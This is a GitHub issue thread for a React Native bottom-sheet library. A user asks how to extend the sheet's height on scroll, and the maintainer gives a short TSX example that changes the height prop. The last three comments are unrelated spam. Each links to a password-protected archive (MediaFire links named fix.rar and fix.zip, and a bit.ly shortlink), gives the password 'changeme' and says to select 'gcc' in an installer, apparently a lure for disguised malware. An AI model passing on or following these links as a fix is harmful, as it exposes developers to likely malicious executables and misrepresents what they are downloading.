### ISSUE TITLE
example of Extend sheet height when its content is scrolled

### ISSUE THREAD

**Issue by Madeean** [stanleyugwu/react-native-bottom-sheet#26]
hi, could you please tell me the code example of Extend sheet height when its content is scrolled?

**Comment by stanleyugwu** [comment]
Something like below should work

```tsx
export default function App() {
  const sheetRef = React.useRef<BottomSheetMethods>(null);
  const [dynamicHeight, setDynamicHeight] = React.useState(200)

  return (
    <View style={styles.container}>
      <BottomSheet ref={sheetRef} height={dynamicHeight}>
        <ScrollView onScroll={() => setDynamicHeight(500)}>
        <Text>HELLO</Text>
        </ScrollView>
      </BottomSheet>
    </View>
  );
}
```

The height prop is somewhat alive lol, so any changes to it would cause the sheet to re-render and adjust it's height accordingly

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
